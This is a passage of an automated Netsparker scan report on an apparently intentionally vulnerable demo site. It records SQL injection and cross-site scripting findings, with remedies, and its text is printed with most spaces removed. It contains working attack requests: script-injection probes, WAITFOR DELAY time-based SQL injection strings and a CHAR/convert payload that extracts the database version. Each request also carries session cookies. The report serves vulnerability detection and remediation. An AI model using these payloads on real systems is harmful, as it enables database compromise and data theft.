ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
VULNERABILITY SUMMARYURL Parameter Method Vulnerability Confirmed
VersionDisclosure(ASPNET)
No
ASPNETIdentified
No
VersionDisclosure(IIS)
No
Cross-siteScriptingProtectionDisabled
No
AccountLogin CookieNotMarkedasSecure
Yes
CriticalFormServedoverHTTP
Yes
CookieNotMarkedasHttpOnly
Yes
[Possible]Cross-siteRequestForgeryinLoginFormDetected
No
AutocompleteEnabled(PasswordField)
Yes
AccountRegister PasswordTransmittedoverHTTP
Yes
AccountUserProfile [Possible]Cross-siteRequestForgeryDetected
No
[Possible]InternalPathDisclosure(nix)
No
apiadmin nsextt GET [Possible]Cross-siteScripting
No
QueryBased QueryString [Possible]Cross-siteScripting
No
apiadminusers E-mailAddressDisclosure
No
apivote comments POST BlindSQLInjection
Yes
comments POST SQLInjection
Yes
comments POST [Possible]Cross-siteScripting
No
2 57
bundles StackTraceDisclosure(ASPNET)
No
Images OPTIONSMethodEnabled
Yes
ImagesMakes ForbiddenResource
Yes
Make InternalServerError
Yes
Make1 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
Out-of-dateVersion(MicrosoftSQLServer)
No
DatabaseErrorMessageDisclosure
No
orderby GET [Possible]SQLInjection
No
DatabaseDetected(MicrosoftSQLServer)
Yes
Make2 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
orderby GET [Possible]SQLInjection
No
Make3 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
orderby GET [Possible]SQLInjection
No
robotstxt RobotstxtDetected
Yes
Search searchTerm GET Cross-siteScripting
Yes
Supercar3 PermanentCross-siteScripting
Yes
[Possible]InternalPathDisclosure(nix)
No
[Possible]InternalPathDisclosure(Windows)
No
SupercarLeaderboard orderBy GET BlindSQLInjection
Yes
orderBy GET SQLInjection
Yes
3 57
4 57
5 TOTALCRITICAL
CONFIRMED
5
1 Blind SQL InjectionNetsparkeridentifiedablindSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabaseInthesetestsSQLinjectionwasnotobviousbutthedifferentresponsesfromthepagebasedontheinjectiontestallowedustoidentifyandconfirmtheSQLinjection
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocatethealldynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM change alllegacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
11 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
5 57
RequestGET Make1orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230021 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtNissans - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
12 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527-
ParametersParameter Type Value
orderBy GET 1 WAITFOR DELAY 0025--
asc GET false
RequestGET SupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527--ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
6 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 231609 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2885Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtSupercar Leaderboard - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
13 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make3orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
7 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
14 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
8 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
